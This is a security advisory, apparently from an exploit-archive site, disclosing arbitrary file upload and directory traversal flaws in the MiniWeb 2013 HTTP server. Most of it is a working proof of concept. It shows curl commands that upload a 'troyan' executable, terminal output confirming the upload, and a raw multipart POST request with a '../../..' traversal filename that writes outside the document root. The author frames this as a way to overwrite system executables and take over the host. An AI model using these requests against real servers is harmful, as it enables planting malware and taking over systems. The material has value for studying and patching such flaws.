MiniWeb (Feb 28 2013) Remote arbitrary file upload Directory traversal

Credit: AkaStep
Risk: High
Local: No
Remote: Yes

========================================= Vulnerable Software: MiniWeb (build 300, built on Feb 28 2013) Official Site: Vulns: Remote arbitrary file upload,Directory traversal. Tested Software/version: MiniWeb (build 300, built on Feb 28 2013) Tested on: Windows XP SP2 32 bit. ===About software:=== MiniWeb is a mini HTTP server implementation written in C language, featuring low system resource consumption, high efficiency, good flexibility and high portability. It is capable to serve multiple clients with a single thread, supporting GET and POST methods, authentication, dynamic contents (dynamic web page and page variable substitution) and file uploading. MiniWeb runs on POSIX complaint OS, like Linux, as well as Microsoft Windows (Cygwin, MinGW and native build with Visual Studio). The binary size of MiniWeb can be as small as 20KB (on x86 Linux). The target of the project is to provide a fast, functional and low resource consuming HTTP server that is embeddable in other applications (as a static or dynamic library) as well as a standalone web server. MiniWeb supports transparent 7-zip decompression. Web contents can be compressed into 7-zip archieves and clients can access the contents inside the 7-zip archive just like in a directory. MiniWeb can also be used in audio/video streaming applications, or more specific, VOD (video-on-demand) service. Currently a VOD client/server is being developed on MiniWeb. ===================================== About vulns: This software suffers from 2 critical vulns: Any remote/local user can upload arbitrary files to web server. Proof of concept: In this scenario using cygwin +curl remote attacker uploads troyan called "taskmgr.exe" to remote web server. user@myhost /cygdrive/c/dir1/dir2 $ ipconfig Windows Ethernet &#8212; . . . . . . . . . : VirtualBox Host-Only Network - Ethernet DNS- . . : . . . . . . . . . . . . : . . . . . . . . . . : . . . . . . . . . . : user@myhost /cygdrive/c/dir1/dir2 $ curl -I curl: (52) Empty reply from server user@myhost /cygdrive/c/dir1/dir2 $ curl <html><head><title>/</title></head><body><table border=0 cellpadding=0 cellspacing=0 width=100%><h2>Directory of /</h2><hr><tr><td width=35%><a href='../'>..</a></td><td width=15%>&lt;dir&gt;</td><td width=15%></td><td>Sat, 06 Apr 2013 23:55:29 GMT</td></tr></ table><hr><i>Directory content generated by MiniWeb</i></body></html> user@myhost /cygdrive/c/dir1/dir2 $ #Uploading remotely our troyan to remote system. user@myhost /cygdrive/c/dir1/dir2 $ curl -i -F name=taskmgr.exe -F filedata=@taskmgr.exe HTTP/1.1 404 Not Found Server: MiniWeb Content-length: 125 Content-Type: text/html <html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL has no content.</p></body></html> user@myhost /cygdrive/c/dir1/dir2 $ #Now fetching directory index from remote system. user@myhost /cygdrive/c/dir1/dir2 $ curl <html><head><title>/</title></head><body><table border=0 cellpadding=0 cellspacing=0 width=100%><h2>Directory of /</h2><hr><tr><td width=35%><a href='../'>..</a></td><td width=15%>&lt;dir&gt;</td><td width=15%></td><td>Sat, 06 Apr 2013 23:55:29 GMT</td></tr><t r><td width=35%><a href='taskmgr.exe'>taskmgr.exe</a></td><td width=15%>329 KB</td><td width=15%>exe file</td><td>Sun, 07 Apr 2013 00:14:38 GMT</td></tr></table><hr><i>Directory content generated by MiniWeb</i></body></html> user@myhost /cygdrive/c/dir1/dir2 user@myhost /cygdrive/c/dir1/dir2 $ #Lol our troyan (taskmgr.exe) uploaded successfully) This is design flaw. user@myhost /cygdrive/c/dir1/dir2 $ curl>task2.exe user@myhost /cygdrive/c/dir1/dir2 $ file task2.exe task2.exe: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed user@myhost /cygdrive/c/dir1/dir2 $ rm -rf task2.exe So,this means any remote user can upload,can spoof,can overwrite any files on remote server. Moreover this web server software contains directory traversal vuln. Using the second vuln this is possible to upload any troyan outside of document root to Operation System + spoof some system executables and as result compromise remote operation system in eg on next reboot when it starts. In this case attacker uses FIddler: =================================== METHOD: POST URL: Host: User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 Firefox/20.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------78522398122376 Content-Length: 84906 request body: -----------------------------78522398122376 Content-Disposition: form-data; name="user" -----------------------------78522398122376 Content-Disposition: form-data; name="pass" -----------------------------78522398122376 Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../../../OWNED_BY_AKASTEP.txt" Content-Type: image/png Dude! Your machine OwnEd! -----------------------------78522398122376 Content-Disposition: form-data; name="button" Upload -----------------------------78522398122376-- ================================================================================ Few Printscreens: 1remotesystem.PNG 2attackersends.PNG ================================================ KUDOSSSSSSS ================================================ to all Aa Team + to all Azerbaijan Black HatZ + *Especially to my bro CAMOUFL4G3 * To All Turkish Hackers+ ottoman38 & HERO_AZE *Super special KUDOS to my bro Brendan Coles! Love you and Respect you dude! Thank you!* ================================================ /AkaStep


Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019,


Back to Top